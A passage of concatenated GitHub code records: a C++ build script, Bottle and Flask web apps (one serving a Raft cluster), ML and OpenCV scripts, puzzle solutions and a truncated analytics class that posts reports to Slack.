evaluate_conv_model(dataset,num_labels,num_hidden=512,verbose=True,with_lstm=True)\n","repo_name":"andreykurenkov/emailinsight","sub_path":"pyScripts/kerasExperiments.py","file_name":"kerasExperiments.py","file_ext":"py","file_size_in_byte":14040,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"27507997811","text":"# Build script\n\n# COMMAND FORMAT:\n# py build.py --server/client/both --debug/release --build/run/clean --doc/nodoc\n# ALL OPTIONS ARE REQUIRED BECAUSE I'M LAZY\n\nimport sys, os\n\nfile_list = \"\"\nexe_name = \"\"\ncompileServer = False\ncompileClient = False\ndebug = False\n\ndef main():\n global compileServer\n global compileClient\n global debug\n \n if sys.argv[1] == \"--server\":\n compileServer = True\n elif sys.argv[1] == \"--client\":\n compileClient = True\n elif sys.argv[1] == \"--both\":\n compileServer = True\n compileClient = True\n else:\n print(\"Invalid option. \\nUsage:\\n\\t--server - Build the server.\\n\\t--client - Build the client.\\n\\t--both - Build both client and server.\")\n \n if sys.argv[2] == \"--debug\":\n debug = True\n elif sys.argv[2] == \"--release\":\n debug = False\n else:\n print(\"Invalid option. \\nUsage:\\n\\t--debug - Build with debug information and dynamic.\\n\\t--release - Build static without debug information.\")\n \n if sys.argv[3] == \"--build\":\n clean()\n build()\n elif sys.argv[3] == \"--run\":\n clean()\n build()\n run()\n elif sys.argv[3] == \"--clean\":\n clean()\n else:\n print(\"Invalid option. \\nUsage:\\n\\tbuild - Build the code.\\n\\trun - Build and run the code.\\n\\tclean - Delete the bin folder and all files within.\")\n \n if sys.argv[4] == \"--doc\":\n gen_doc()\n elif sys.argv[4] == \"--nodoc\":\n print(\"Warning: Documentation not generated, may be out of date!\")\n else:\n print(\"Invalid option. 
\\nUsage:\\n\\t--doc - Build documentation.\\n\\t--nodoc - Do not build documentation.\")\n return\n\ndef build():\n global exe_name\n global file_list\n if compileClient:\n file_list = \"\"\n exe_name = \"client.exe\"\n os.chdir(\".\\\\client\")\n os.mkdir(\".\\\\bin\")\n compile(\"client_socket\", True)\n compile(\"main\", True)\n compile(\"\", False)\n os.chdir(\"..\\\\\")\n if compileServer:\n file_list = \"\"\n exe_name = \"server.exe\"\n os.chdir(\".\\\\server\")\n os.mkdir(\".\\\\bin\")\n compile(\"server_socket\", True)\n compile(\"main\", True)\n compile(\"\", False)\n os.chdir(\"..\\\\\")\n\ndef compile(cpp_file, component):\n global file_list\n global exe_name\n\n if component:\n os.system(\"echo Compiling \" + cpp_file)\n os.system(\"g++ -std=c++11 -c -g \" + cpp_file + \".cpp\" + \" -o \" + \".\\\\bin\\\\\" + cpp_file + \".o\" + \" -D_WIN32_WINNT=0x0A00\")\n file_list += (\".\\\\bin\\\\\" + cpp_file + \".o \")\n else:\n #print(file_list)\n os.system(\"g++ -std=c++11 -g \" + file_list + \"-o \" + \".\\\\bin\\\\\" + exe_name + \" -L .\\\\lib -lsocket_handler\" + \" -lws2_32\" + \" -D_WIN32_WINNT=0x0A00\")\n\ndef gen_doc():\n os.system(\"doxygen .\\\\docs\\\\lovelace.doxygen\")\n os.chdir(\".\\\\client\\\\\")\n os.chdir(\"..\\\\docs\\\\latex\")\n os.system(\".\\\\make\")\n os.chdir(\"..\\\\..\\\\client\\\\\")\n \ndef run():\n if compileServer:\n os.chdir(\".\\\\server\")\n os.system(\".\\\\bin\\\\server.exe\")\n os.chdir(\"..\\\\\")\n if compileClient:\n os.chdir(\".\\\\client\")\n os.system(\".\\\\bin\\\\client.exe\")\n os.chdir(\"..\\\\\")\n\ndef clean():\n if compileServer:\n os.chdir(\".\\\\server\\\\\")\n os.system(\"rmdir /s /q .\\\\bin\\\\\")\n os.chdir(\"..\\\\\")\n if compileClient:\n os.chdir(\".\\\\client\")\n os.system(\"rmdir /s /q .\\\\bin\\\\\")\n os.chdir(\"..\\\\\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"regerj/lovelace","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40105001503","text":"#-*- coding:utf-8 -*-\n\nimport os\nimport sys\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nLIBS_ROOT = os.path.join(APP_ROOT, 'libs')\nTEMPLATES_ROOT = os.path.join(APP_ROOT, 'templates')\nSTATIC_ROOT = os.path.join(APP_ROOT, 'static')\nsys.path.insert(0, LIBS_ROOT)\n\nimport bottle\nfrom bottle import Bottle, static_file, request\nfrom bottle import mako_template as template\nfrom beaker.middleware import SessionMiddleware\n\nbottle.TEMPLATE_PATH.insert(0, TEMPLATES_ROOT)\nsession_options = {\n 'session.type': 'cookie',\n 'session.validate_key': True,\n}\n\napp = Bottle()\n\n\n@app.route('/')\n@app.route('/user/')\ndef hello(name=\"vvonder\"):\n return template('index', **locals())\n\n\n@app.route('/test')\ndef test():\n s = request.environ.get('beaker.session')\n s['test'] = s.get('test', 0) + 1\n s.save()\n return 'Test conter: %d' % s['test']\n\n\n@app.route('/static/')\ndef send_static(filename):\n return static_file(filename, root=STATIC_ROOT)\n\n\napp = SessionMiddleware(app, session_options)\n\nif 'SERVER_SOFTWARE' in os.environ:\n from bae.core.wsgi import WSGIApplication\n application = WSGIApplication(app)\nelse:\n from bottle import run\n run(app, host='0.0.0.0', reloader=True, 
debug=True)\n","repo_name":"vvonder/lab","sub_path":"bae/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27308472443","text":"\"\"\"User content reporting.\"\"\"\n\nfrom typing import Optional\n\nfrom comcatlib import User\nfrom marketplace import Offer\nfrom tenantcalendar import UserEvent\nfrom tenantforum import Response, Topic\n\nfrom reportlib.orm import OfferReport\nfrom reportlib.orm import TopicReport\nfrom reportlib.orm import ResponseReport\nfrom reportlib.orm import UserEventReport\n\n\n__all__ = [\"report_offer\", \"report_topic\", \"report_response\", \"report_user_event\"]\n\n\ndef report_offer(\n reporter: User,\n offer: Offer,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> OfferReport:\n \"\"\"Report an offer.\"\"\"\n\n try:\n report = OfferReport.get(\n (OfferReport.reporter == reporter) & (OfferReport.offer == offer)\n )\n except OfferReport.DoesNotExist:\n report = OfferReport(reporter=reporter, offer=offer)\n\n return report.update_report(title=title, text=text, image=image)\n\n\ndef report_topic(\n reporter: User,\n topic: Topic,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> TopicReport:\n \"\"\"Report a tenant forum topic.\"\"\"\n\n try:\n report = TopicReport.get(\n (TopicReport.reporter == reporter) & (TopicReport.topic == topic)\n )\n except TopicReport.DoesNotExist:\n report = TopicReport(reporter=reporter, topic=topic)\n\n return report.update_report(title=title, text=text, image=image)\n\n\ndef report_response(\n reporter: User,\n response: Response,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> ResponseReport:\n \"\"\"Report a tenant forum response.\"\"\"\n\n try:\n report = ResponseReport.get(\n (ResponseReport.reporter == reporter)\n & (ResponseReport.response == response)\n )\n except ResponseReport.DoesNotExist:\n report = ResponseReport(reporter=reporter, response=response)\n\n return report.update_report(title=title, text=text, image=image)\n\n\ndef report_user_event(\n reporter: User,\n user_event: UserEvent,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> UserEventReport:\n \"\"\"Report a tenant forum response.\"\"\"\n\n try:\n report = UserEventReport.get(\n (UserEventReport.reporter == reporter)\n & (UserEventReport.user_event == user_event)\n )\n except UserEventReport.DoesNotExist:\n report = UserEventReport(reporter=reporter, user_event=user_event)\n\n return report.update_report(title=title, text=text, image=image)\n","repo_name":"homeinfogmbh/reportlib","sub_path":"reportlib/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34274028447","text":"import json\n\nimport requests\nfrom decouple import config\nfrom flask import jsonify, redirect, request\n\nfrom src.api.helper import serialize\nfrom src.cache.cache import cache\nfrom src.messages.client_message import ClientMessage\n\n\ndef external_routes(api):\n ip = config(\"CONTAINER_IP\")\n port = config(\"CONTAINER_PORT\")\n\n @api.route('/', methods=['GET'])\n def root():\n return redirect('/status', code=302)\n\n @api.route('/status', methods=['GET'])\n def status():\n return 
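The four report_* functions in reportlib above differ only in the model class and the name of the content field. A hypothetical generic helper showing the shared get-or-create shape (report_content is illustrative; keeping four explicit functions, as the original does, is arguably clearer for a small fixed set):

def report_content(model, field, reporter, content, *, title=None, text=None, image=None):
    # Get or create the report row keyed on (reporter, content), then update it.
    try:
        report = model.get(
            (model.reporter == reporter) & (getattr(model, field) == content)
        )
    except model.DoesNotExist:
        report = model(**{"reporter": reporter, field: content})
    return report.update_report(title=title, text=text, image=image)

# e.g. report_content(OfferReport, "offer", reporter, offer, title=True)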
jsonify(dict(status='OK', message={\n 'internal_ip': ip,\n 'note': 'This is only an External API to get data from redis database',\n 'port': port,\n 'endpoints': [\n {'method': 'GET', 'locator': '/status', 'description': 'shows the status of the external api'},\n {'method': 'GET', 'locator': '/nodes', 'description': 'shows all nodes and leader node'},\n {'method': 'GET', 'locator': '/nodes?ip=',\n 'description': 'get detail about node using Node\\'s internal IP'},\n {'method': 'GET', 'locator': '/elections', 'description': 'shows all elections for each term'},\n {'method': 'GET', 'locator': '/elections?term=', 'description': 'get election for a term'},\n {'method': 'GET', 'locator': '/leaders', 'description': 'shows all leaders for each term'},\n {'method': 'GET', 'locator': '/leaders?term=', 'description': 'get leader for a term'},\n {'method': 'GET', 'locator': '/logs', 'description': 'get logs for all nodes'},\n {'method': 'GET', 'locator': '/logs?ip=', 'description': 'get logs for node with IP'},\n {'method': 'GET', 'locator': '/nodes/move?x=&y=',\n 'description': 'move leader node and other nodes units. can be +ve or -ve'},\n {'method': 'GET', 'locator': '/nodes/position',\n 'description': 'get current positions of all nodes in raft'},\n {'method': 'GET', 'locator': '/nodes/full', 'description': 'get full details of all nodes in raft'},\n ],\n })), 200\n\n @api.route('/nodes', methods=['GET'])\n def nodes():\n node_ip = request.args.get('ip', None)\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n\n if all_nodes:\n if node_ip:\n filtered = list(filter(lambda node: node['_name'] == f'{node_ip.strip()}:{port}', all_nodes))\n if len(filtered) > 0:\n resp = requests.get(f'http://{node_ip}:{port}', timeout=10)\n data = resp.json()\n return jsonify(dict(status='OK', data=data['message'],\n message=f\"Successfully fetched node with IP {node_ip}\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No node with IP {node_ip} in raft\")), 404\n else:\n return jsonify(dict(status='OK', data=all_nodes, message=\"Successfully fetched nodes\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n @api.route('/elections', methods=['GET'])\n def elections():\n term = request.args.get('term', None)\n election = cache.get('election')\n election = json.loads(election) if election else None\n\n if election:\n if term:\n term_election = election.get(term, None)\n if term_election:\n return jsonify(dict(status='OK', data=term_election,\n message=f\"Successfully fetched election for term (Term {term})\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No election for term (Term {term})\")), 404\n else:\n return jsonify(dict(status='OK', data=election, message=\"Successfully fetched elections\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No election so far\")), 200\n\n @api.route('/leaders', methods=['GET'])\n def leaders():\n term = request.args.get('term', None)\n leader = cache.get('leader')\n leader = json.loads(leader) if leader else None\n\n if leader:\n if term:\n term_leader = leader.get(term, None)\n if term_leader:\n return jsonify(dict(status='OK', data=term_leader,\n message=f\"Successfully fetched leader for term (Term {term})\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No leader for term (Term {term})\")), 404\n else:\n return jsonify(dict(status='OK', data=leader, message=\"Successfully fetched 
leaders\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No leader so far\")), 200\n\n @api.route('/logs', methods=['GET'])\n def logs():\n node_ip = request.args.get('ip', None)\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n\n if all_nodes:\n if node_ip:\n filtered = list(filter(lambda node: node['_name'] == f'{node_ip.strip()}:{port}', all_nodes))\n if len(filtered) > 0:\n resp = requests.get(f'http://{node_ip}:{port}/logs', timeout=10)\n data = resp.json()\n return jsonify(dict(status='OK', data=data['message'],\n message=f\"Successfully fetched node logs with IP {node_ip}\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No node with IP {node_ip} in raft\")), 404\n else:\n result = []\n for n in all_nodes:\n resp = requests.get(f\"http://{n['_name']}/logs\")\n data = resp.json()\n result.append(data)\n return jsonify(dict(status='OK', data=result, message=\"Successfully fetched nodes logs\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n @api.route('/nodes/move', methods=['GET'])\n def move_nodes():\n x = int(request.args.get('x', '0'))\n y = int(request.args.get('y', '0'))\n leaders = cache.get('leader')\n leaders = json.loads(leaders) if leaders else None\n\n if leaders:\n term = max(leaders, key=int)\n leader = leaders.get(term)\n node_addr = leader['_name']\n\n message = ClientMessage(\n 'CLIENT_IP',\n node_addr,\n leader['term'],\n {\n \"move\": [x, y],\n }\n )\n\n resp = requests.post(f'http://{node_addr}/message', json=serialize(message), timeout=60)\n data = resp.json()\n\n if data and hasattr(data, '__getitem__'):\n return jsonify(dict(status='OK', data=data,\n message=f\"Nodes moved successfully. 
Controlled by leader {node_addr}\")), 200\n else:\n return jsonify(dict(status='OK', data=data,\n message=f\"Failed to move leader node: {node_addr}\\nCould \"\n f\"be that the leader is unavailable due to an ongoing election\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No leader appointed yet in raft\")), 404\n\n @api.route('/nodes/position', methods=['GET'])\n def nodes_position():\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n response = []\n\n if all_nodes:\n for node in all_nodes:\n try:\n resp = requests.get(f\"http://{node['_name']}/status\", timeout=60)\n data = resp.json()\n if data:\n message = data.get('message', {}).get('node', {})\n response.append({'node': message.get('_name'), 'position': message.get('_position')})\n except:\n print('Unfortunate')\n return jsonify(dict(status='OK', data=response,\n message='Successfully fetched node positions')), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n @api.route('/nodes/full', methods=['GET'])\n def nodes_full():\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n response = []\n\n if all_nodes:\n for node in all_nodes:\n try:\n resp = requests.get(f\"http://{node['_name']}/status\", timeout=60)\n data = resp.json()\n if data:\n response.append(data)\n except:\n print('Unfortunate')\n return jsonify(dict(status='OK', data=response,\n message='Successfully fetched node positions')), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n","repo_name":"mbao01/raft-escort","sub_path":"src/api/api_external.py","file_name":"api_external.py","file_ext":"py","file_size_in_byte":9472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70257759210","text":"# from parse import *\nfrom functools import reduce\nimport util\nimport re\nimport json\nimport os\n\n\ndef switchToTest():\n global filename\n filename = \"..\\\\data\\\\test.txt\"\n\n\ndef part1(lines):\n diff_1 = []\n diff_3 = []\n\n length = len(lines)\n previous = 0\n for index, jolt in enumerate(lines):\n # if index == length - 1:\n # diff_3.append(jolt)\n # break\n if index != 0:\n previous = lines[index - 1]\n if jolt - previous == 1:\n diff_1.append(jolt)\n elif jolt - previous == 3:\n diff_3.append(jolt)\n print(\"\\n\\n\")\n print(len(diff_1))\n print(len(diff_3) + 1)\n\n pass\n\n\ndef aggregateCounter(index, lines, agg, head):\n head = head.copy()\n head.append(lines[index])\n length = len(lines)\n if index == length - 1:\n agg.append(head)\n return\n\n jolt = lines[index]\n for inc in range(1, 4):\n tmp = jolt + inc\n if tmp in lines:\n aggregateCounter(list.index(lines, tmp), lines, agg, head)\n\n\ndef part2_1(lines):\n agg = []\n print(lines)\n aggregateCounter(0, lines, agg, [])\n # print(*agg[:30], sep=\"\\n\")\n print(len(agg))\n return len(agg)\n\n\ndef part2(lines):\n multList = []\n lines.insert(0, 0)\n lines.append(max(lines))\n index = 0\n while index < len(lines):\n i = 0\n tmpList = [lines[index]]\n while True:\n current = lines[index]\n index += 1\n\n if index + 1 >= len(lines):\n break\n\n next = lines[index]\n tmpList.append(next)\n if next - current == 3:\n index = list.index(lines, next)\n break\n\n if len(tmpList) > 2:\n index = list.index(lines, tmpList[-1])\n multList.append(part2_1(tmpList))\n\n print(multList)\n print(reduce(lambda x, y: x * y, multList))\n\n\nfilename = 
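The external API above is driven entirely over HTTP, so a client needs nothing beyond requests. A short hedged example against the /nodes/move and /nodes/position endpoints listed in /status (the base URL is a placeholder for wherever the container is exposed, not a value from the source):

import requests

BASE = "http://localhost:5000"  # placeholder host:port

# Ask the current leader to move the fleet 3 units in x and 2 in y.
resp = requests.get(f"{BASE}/nodes/move", params={"x": 3, "y": 2}, timeout=60)
print(resp.status_code, resp.json().get("message"))

# Poll the resulting node positions.
print(requests.get(f"{BASE}/nodes/position", timeout=60).json())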
\"..\\\\data\\\\d10_input.txt\"\n# switchToTest()\n\nabs_file_path = os.path.join(os.path.dirname(__file__), filename)\nlines = open(abs_file_path, \"r\").readlines()\nlines = list(map(lambda x: int(x.strip()), lines))\nlines.sort()\n\n# print (*lines, sep= \"\\n\")\n\n# part1(lines)\npart2(lines)\n","repo_name":"mh3r/advent_of_code_solutions","sub_path":"advent2020/src/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36760583634","text":"# Linear Support Vector Machine: Soft Margin\n# ----------------------------------\n#\n# This function shows how to use TensorFlow to\n# create a soft margin SVM\n#\n# We will use the iris data, specifically:\n# x1 = Sepal Length\n# x2 = Petal Width\n# Class 1 : I. setosa\n# Class -1: not I. setosa\n#\n# We know here that x and y are linearly seperable\n# for I. setosa classification.\n\n# import required libraries\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport os\nimport datetime\nfrom packaging import version\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import datasets\nfrom tensorflow.python.framework import ops\n\nprint(__doc__)\n\n# Display current path\nPROJECT_ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nprint('PROJECT_ROOT_DIR = \\n{0}\\n'.format(PROJECT_ROOT_DIR))\n\n# Display tensorflow version\nprint(\"TensorFlow version: \", tf.version.VERSION)\nassert version.parse(tf.version.VERSION).release[0] >= 2, \"This notebook requires TensorFlow 2.0 or above.\"\n\n# Set random seeds\nnp.random.seed(7)\ntf.random.set_seed(7)\n\n# Load the data\n# iris.data = [(Sepal Length, Sepal Width, Petal Length, Petal Width)]\niris = datasets.load_iris()\nx_vals = np.array([[x[0], x[3]] for x in iris.data])\ny_vals = np.array([1 if y == 0 else -1 for y in iris.target])\n\n# Split data into train/test sets\ntrain_indices = np.random.choice(\n len(x_vals),\n int(round(len(x_vals)*0.9)),\n replace=False\n )\n\ntest_indices = np.array(list(set(range(len(x_vals))) - set(train_indices)))\nx_vals_train = x_vals[train_indices]\nx_vals_test = x_vals[test_indices]\ny_vals_train = y_vals[train_indices]\ny_vals_test = y_vals[test_indices]\n\n# Declare batch size\nbatch_size = 135\n\n# Create variables for linear regression\nA = tf.cast(tf.Variable(tf.random.normal(shape=[2, 1])), dtype=tf.float32)\nb = tf.cast(tf.Variable(tf.random.normal(shape=[1, 1])), dtype=tf.float32)\n\ndef loss(input_x, aa, bb, targets):\n # Declare model operations\n model_output_loss = tf.subtract(tf.matmul(input_x, aa), bb)\n\n # Declare vector L2 'norm' function squared\n l2_norm = tf.reduce_sum(tf.square(aa))\n\n # Declare loss function\n # Loss = max(0, 1-pred*actual) + alpha * L2_norm(A)^2\n # L2 regularization parameter, alpha\n alpha = tf.constant([0.01])\n\n # Margin term in loss\n classification_term = tf.reduce_mean(tf.maximum(0., tf.subtract(1., tf.multiply(model_output_loss, targets))))\n\n # Put terms together\n return tf.add(classification_term, tf.multiply(alpha, l2_norm))\n\ndef grad(input_x, aa, bb, targets):\n with tf.GradientTape() as tape:\n loss_value = loss(input_x, aa, bb, targets)\n return tape.gradient(loss_value, [aa, bb])\n\ndef accuracy(input_x, aa, bb, targets):\n # Declare model operations\n model_output_acc = tf.subtract(tf.matmul(input_x, aa), bb)\n\n # Declare prediction function\n prediction = tf.sign(model_output_acc)\n return 
tf.reduce_mean(tf.cast(tf.equal(prediction, targets), tf.float32)) \n\n# Declare optimizer\noptimizer = tf.keras.optimizers.SGD(learning_rate=0.01)\n\n# Training loop\nloss_vec = []\ntrain_accuracy = []\ntest_accuracy = []\n\nfor i in range(500):\n rand_index = np.random.choice(len(x_vals_train), size=batch_size)\n rand_x = tf.cast(x_vals_train[rand_index], dtype=tf.float32)\n rand_y = tf.cast(np.transpose([y_vals_train[rand_index]]), dtype=tf.float32)\n\n grads = grad(rand_x, A, b, rand_y)\n optimizer.apply_gradients(zip(grads, [A, b]))\n\n temp_loss = loss(rand_x, A, b, rand_y)\n loss_vec.append(temp_loss)\n\n train_acc_temp = accuracy(tf.cast(x_vals_train, dtype=tf.float32), A, b, tf.cast(np.transpose([y_vals_train]), dtype=tf.float32))\n train_accuracy.append(train_acc_temp)\n\n test_acc_temp = accuracy(tf.cast(x_vals_test, dtype=tf.float32), A, b, tf.cast(np.transpose([y_vals_test]), dtype=tf.float32))\n test_accuracy.append(test_acc_temp)\n\n if (i + 1) % 100 == 0:\n print('Step #{0} A = {1}, b = {2}'.format(i + 1, A.numpy(), b.numpy()))\n print('Loss = {0}\\n'.format(temp_loss.numpy()))\n\n# Extract coefficients\n[[a1], [a2]] = A.numpy()\n[[b]] = b.numpy()\nslope = -a2/a1\ny_intercept = b/a1\n\n# Extract x1 and x2 vals\nx1_vals = [d[1] for d in x_vals]\n\n# Get best fit line\nbest_fit = []\nfor i in x1_vals:\n best_fit.append(slope * i + y_intercept)\n\n# Separate I. setosa\nsetosa_x = [d[1] for i, d in enumerate(x_vals) if y_vals[i] == 1]\nsetosa_y = [d[0] for i, d in enumerate(x_vals) if y_vals[i] == 1]\nnot_setosa_x = [d[1] for i, d in enumerate(x_vals) if y_vals[i] == -1]\nnot_setosa_y = [d[0] for i, d in enumerate(x_vals) if y_vals[i] == -1]\n\n# Plot data and line\nplt.plot(setosa_x, setosa_y, 'o', label='I. setosa')\nplt.plot(not_setosa_x, not_setosa_y, 'x', label='Non-setosa')\nplt.plot(x1_vals, best_fit, 'r-', label='Linear Separator', linewidth=3)\nplt.ylim([0, 10])\nplt.legend(loc='lower right')\nplt.title('Sepal Length vs Petal Width')\nplt.xlabel('Petal Width')\nplt.ylabel('Sepal Length')\nplt.show()\n\n# Plot train/test accuracies\nplt.plot(train_accuracy, 'k-', label='Training Accuracy')\nplt.plot(test_accuracy, 'r--', label='Test Accuracy')\nplt.title('Train and Test Set Accuracies')\nplt.xlabel('Generation')\nplt.ylabel('Accuracy')\nplt.legend(loc='lower right')\nplt.show()\n\n# Plot loss over time\nplt.plot(loss_vec, 'k-')\nplt.title('Loss per Generation')\nplt.xlabel('Generation')\nplt.ylabel('Loss')\nplt.show()\n\ndate_today = datetime.date.today()\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\nprint (\n ' finished linear_svm.py ({0}) \\n'.format(date_today)\n )\n\nprint(\n '------------------------------------------------------------------------------------------------------\\n'\n )\nprint()\nprint()\nprint()","repo_name":"munezou/VsCodeProject","sub_path":"Python/lect_tensorflow/tensorflow_cookbook_master/sec04_Support_Vector_Machines/chpt02_Working_with_Linear_SVMs/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30599386226","text":"import cv2\ncap = cv2.VideoCapture(0)\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nwriter = cv2.VideoWriter(\"../videos/video_1.mp4\", fourcc, 20.0, (width,height))\n\nwhile True:\n ret, frame = cap.read()\n 
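The SVM script above uses the standard TF2 custom-training idiom: compute the loss under a GradientTape, differentiate with respect to the variables, and hand the gradients to an optimizer. The same skeleton in isolation, reduced to one scalar variable so it runs on its own (the quadratic loss is a stand-in for the hinge loss above):

import tensorflow as tf

w = tf.Variable(5.0)
opt = tf.keras.optimizers.SGD(learning_rate=0.1)

for _ in range(50):
    with tf.GradientTape() as tape:
        loss = (w - 2.0) ** 2  # stand-in loss with its minimum at w = 2
    grads = tape.gradient(loss, [w])
    opt.apply_gradients(zip(grads, [w]))

print(w.numpy())  # approaches 2.0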
writer.write(frame)\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncap.release()\nwriter.release() \ncv2.destroyAllWindows() ","repo_name":"muhammadali448/computerVisionOpenCv","sub_path":"videoProcessing/connectingVideo.py","file_name":"connectingVideo.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1564048083","text":"'''N, K = map(int,input().split())\nweight = []\nvalue = []\nfor _ in range(N) :\n w, v = map(int,input().split())\n weight.append(w)\n value.append(v)\nmax = 0\nfor i in range(N) :\n sum = K\n v_m = value[i]\n sum -= weight[i]\n print(\"11111: \",weight[i])\n for a in range(i+1,N) :\n if weight[a] <= sum :\n sum -= weight[a]\n v_m += value[a]\n print(\"a: \",weight[a])\n if max < v_m :\n max = v_m\nprint(max)'''\nimport sys\n\n(N, K) = map(int, sys.stdin.readline().split())\nitem = [[0, 0]]\nfor i in range(1, N + 1):\n item.append(list(map(int, sys.stdin.readline().split())))\ndp = [[0] * (K + 1) for _ in range(N + 1)] # (N+1) x (K+1) matrix\n\nfor i in range(1, N + 1):\n for j in range(1, K + 1):\n if j >= item[i][0]:\n dp[i][j] = max(dp[i-1][j], dp[i-1][j-item[i][0]] + item[i][1])\n else: \n dp[i][j] = dp[i-1][j]\n\nprint(dp)","repo_name":"YOMi-Ed/BaekJoon","sub_path":"12865.py","file_name":"12865.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24762008147","text":"from random import randint\nimport logging\nimport requests\nimport json\n\n\nclass Research:\n def __init__(self, data_path):\n self.data_path = data_path\n self.logger = logging.getLogger('logger')\n self.logger.setLevel(logging.DEBUG)\n self.handler = logging.FileHandler('analytics.log', mode='w')\n self.logger.addHandler(self.handler)\n self.formatter = logging.Formatter(fmt='%(asctime)s %(message)s')\n self.handler.setFormatter(self.formatter)\n self.__file_reader = 0\n # self.data = self.file_reader()\n # self.calc = self.Calculations(self.data, self.logger)\n # self.analytics = self.Analytics(self.data, self.logger)\n\n def file_reader(self, has_header=True):\n if self.__file_reader != 0:\n self.logger.debug('Read ' + self.data_path)\n self.__file_reader += 1\n with open(self.data_path, 'r') as infile:\n rows = infile.readlines()\n if has_header:\n header = rows[0].split(',')\n if len(header) != 2:\n self.logger.error('File has wrong header')\n raise Exception('File has wrong header')\n rows = rows[1:]\n if len(rows) == 0:\n self.logger.error('File has no data')\n raise Exception('File has no data')\n res = []\n for row in rows:\n row = row.strip()\n if row != '0,1' and row != '1,0':\n self.logger.error('File has wrong data')\n raise Exception('File has wrong data')\n res.append([int(n) for n in row.split(',')])\n return res\n\n def send_report(self, message, webhook):\n slack_data = {'text': message}\n requests.post(\n webhook,\n data=json.dumps(slack_data),\n headers={'Content-Type': 'application/json'}\n )\n \n class Calculations:\n def __init__(self, data, logger):\n self.data = data\n self.logger = logger\n \n def counts(self):\n self.logger.debug('Calculating the counts of heads and tails')\n return [sum([el[0] for el in self.data]), sum([el[1] for el in self.data])]\n\n def fractions(self, heads, tails):\n self.logger.debug('Calculating the fractions of heads and tails')\n return [heads / (heads + tails) * 
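The active solution in 12865.py above fills an (N+1) x (K+1) table; note the judge expects dp[N][K] rather than the whole table that the final print emits. Because row i only reads row i-1, the table can also be rolled into a single array by iterating capacities downward — a hedged sketch of that space optimization:

def knapsack(capacity, items):
    # items: list of (weight, value); dp[j] = best value achievable within capacity j
    dp = [0] * (capacity + 1)
    for w, v in items:
        for j in range(capacity, w - 1, -1):  # descend so each item is used at most once
            dp[j] = max(dp[j], dp[j - w] + v)
    return dp[capacity]

print(knapsack(7, [(6, 13), (4, 8), (3, 6), (5, 12)]))  # 14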
